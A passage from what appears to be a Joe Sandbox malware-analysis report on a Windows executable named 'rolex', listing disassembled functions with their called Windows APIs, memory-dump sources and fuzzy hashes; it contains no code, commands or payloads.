                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3118131910-0
                                                                                • Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                                                                                • Instruction ID: 971cd316e9af5d9f1531140fdfb539f2432f5b096b0e2bd954f48da5fe332379
                                                                                • Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                                                                                • Instruction Fuzzy Hash: CA21B632A1A78181EA10AB29E45426EA360FF89B94F915234EA9D42AB9EF3CD140C750
                                                                                Function 00007FF7AB4A32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                                                                                • Instruction ID: 218d68eabbcd6a5d8665d1de3c39a6ca1d51a350c605576c97e722e6806af2b7
                                                                                • Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                                                                                • Instruction Fuzzy Hash: 8C218372A1978182EA10EB2DF444229E361FBC9BA4F910235EA9D43BF5DF3CD540C710
                                                                                Function 00007FF7AB4CBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction ID: 2e7ce19cfc89def169cd01d8998475052b2ce6f656da0c86bbe57b37c8643daf
                                                                                • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                • Instruction Fuzzy Hash: 77E04F24F0630A46EB947B3A9895379A3526F89B46F924438C80E433B6CE3EE40D8730
                                                                                Function 00007FF7AB49F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49F895
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49F89B
                                                                                  • Part of subcall function 00007FF7AB4A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                • String ID:
                                                                                • API String ID: 3587649625-0
                                                                                • Opcode ID: 23f630cba899342486ec3d5de318505faaaca4e13abb6a95497164dac5ca7356
                                                                                • Instruction ID: 77f542f4eb584eb4bcaff6a11109c9aa25eb84d770620a0ee0cca40d41449fb0
                                                                                • Opcode Fuzzy Hash: 23f630cba899342486ec3d5de318505faaaca4e13abb6a95497164dac5ca7356
                                                                                • Instruction Fuzzy Hash: F391A072A1AB8190EB10EF38D8445ADA361FB85B98FD14135FA5C07AF9DF78E545C320
                                                                                Function 00007FF7AB493904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
                                                                                • Instruction ID: 819e70a0d97554ac737eb871f90ac3edf5a8caed3133aa3ea66cbe6065f2565c
                                                                                • Opcode Fuzzy Hash: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
                                                                                • Instruction Fuzzy Hash: DA41E322F1665184FB00EBB9D4406BDA331AF46BD8F954135EE1D27BFADE38D4828310
                                                                                Function 00007FF7AB4A2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7AB4A274D), ref: 00007FF7AB4A28A9
                                                                                • GetLastError.KERNEL32(?,00007FF7AB4A274D), ref: 00007FF7AB4A28B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction ID: 1a80079d0e42896ee03a24cb5df68158e999c32ecdc27f40163319588bcc8b1b
                                                                                • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                • Instruction Fuzzy Hash: CC31EA32B1B95282FE606B2ED540675E390AF04BD4F960239EE1D077B4DE3CE541A760
                                                                                Function 00007FF7AB4922BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1746051919-0
                                                                                • Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                                                                                • Instruction ID: 7f458c9be0113581fc735069f25bc6792e150deb18d9df8a4cea2af6000051b3
                                                                                • Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                                                                                • Instruction Fuzzy Hash: D231A122A1A74582EA20AB39E4457BAF360EB85B90F854231EA9C07BB5DF3CE5408710
                                                                                Function 00007FF7AB4A2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: File$BuffersFlushTime
                                                                                • String ID:
                                                                                • API String ID: 1392018926-0
                                                                                • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction ID: bdebe76beced6162269273d6833ddcb257996cfe7d2c9e4c07af8b754edf7769
                                                                                • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                • Instruction Fuzzy Hash: 1921F122F0FB42A6FA62AE19D4003BAD790AF01794F964039DF4C062F5EE3CD486D320
                                                                                Function 00007FF7AB4AAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                • Instruction ID: 4ee6fd2c1ea2bfdad2798521425080140d643e44eaf03e5b14cf5c8353dfc77d
                                                                                • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                • Instruction Fuzzy Hash: F2118E72B0A74185EA00AF2EA840428FBA1BB88FC0F968439CA0D93730EE7CF5518754
                                                                                Function 00007FF7AB4A2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                • Instruction ID: 13f293ed126499a39ad428f0c202738430c22c4c44cc49c465dcd2d21d12b0c0
                                                                                • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                • Instruction Fuzzy Hash: BF11B121A1A64282FB60AB29E840279E760FB44BB4F950735DA7D062F4DF3CE982D310
                                                                                Function 00007FF7AB49255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Item$RectText$ClientWindowswprintf
                                                                                • String ID:
                                                                                • API String ID: 402765569-0
                                                                                • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction ID: bb2dc2541cae2303fcb44893a636d273d66093d033e2b16a910fe2d07ca9fe6f
                                                                                • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction Fuzzy Hash: 95011221A0F38A41FE55776AA454679D7519F85B54F8A4035E84D062B9EE2CF884C320
                                                                                Function 00007FF7AB4AEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7AB4AEBAD,?,?,?,?,00007FF7AB4A5752,?,?,?,00007FF7AB4A56DE), ref: 00007FF7AB4AEB5C
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF7AB4AEB6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Process$AffinityCurrentMask
                                                                                • String ID:
                                                                                • API String ID: 1231390398-0
                                                                                • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction ID: 0817adcb32f65533a62112da8601f2363bfb4191d1c529f14afd29576dd038e8
                                                                                • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction Fuzzy Hash: 54E02B61F1654642DF49EF5DC4445F9B392BFC8B40FC58035D60B83634DE2CE1498B00
                                                                                Function 00007FF7AB4C21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1173176844-0
                                                                                • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                • Instruction ID: ddfdfd7ec0acdf5f2bccbdefdea384879df63144bec84b97b47061338c9d4d89
                                                                                • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                • Instruction Fuzzy Hash: 98E01240E0F20B41FD59367E18251B481904F1BF70EDF2730DE3E046F6AD6CA5919130
                                                                                Function 00007FF7AB4CD90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                • String ID:
                                                                                • API String ID: 588628887-0
                                                                                • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                • Instruction ID: c3b773510616ae4bd7cefc2f4864232ba70644693c0772add03ecee7fb40b467
                                                                                • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                • Instruction Fuzzy Hash: 50E08C60F0BA0382FF48BFFA98051B8E3E05F95F54BC60434C90D86272EE2CA4B18620
                                                                                Function 00007FF7AB4933E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                                                                                • Instruction ID: 80c131fae62b9bbc2c30260db6abb84e7fddc9b0d11c5df2fb78cf499cdc00de
                                                                                • Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                                                                                • Instruction Fuzzy Hash: F6D1A562B0A68156EF68EB3D95446B9F7E1FB06B84F864035DB5D477B1CF38E8608320
                                                                                Function 00007FF7AB4BCAD0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: e2460866a0684328410107459c6d972396d79668fc4668c3375d4f16519848c4
                                                                                • Instruction ID: 790406e4bb7baaedcb223bf09e447acbee1dd26c4a6f6d0c525cc48f4a19a193
                                                                                • Opcode Fuzzy Hash: e2460866a0684328410107459c6d972396d79668fc4668c3375d4f16519848c4
                                                                                • Instruction Fuzzy Hash: E4916322F1965288FB00EBB8D8841EC6B75AF01768FD50635DA2D56AFADF78D485C320
                                                                                Function 00007FF7AB4B1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4AE948: ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AE974
                                                                                  • Part of subcall function 00007FF7AB4AE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7AB4AE993
                                                                                  • Part of subcall function 00007FF7AB4AE948: DeleteCriticalSection.KERNEL32 ref: 00007FF7AB4AE9AA
                                                                                  • Part of subcall function 00007FF7AB4AE948: CloseHandle.KERNEL32 ref: 00007FF7AB4AE9B7
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4B1ACB
                                                                                Memory Dump Source
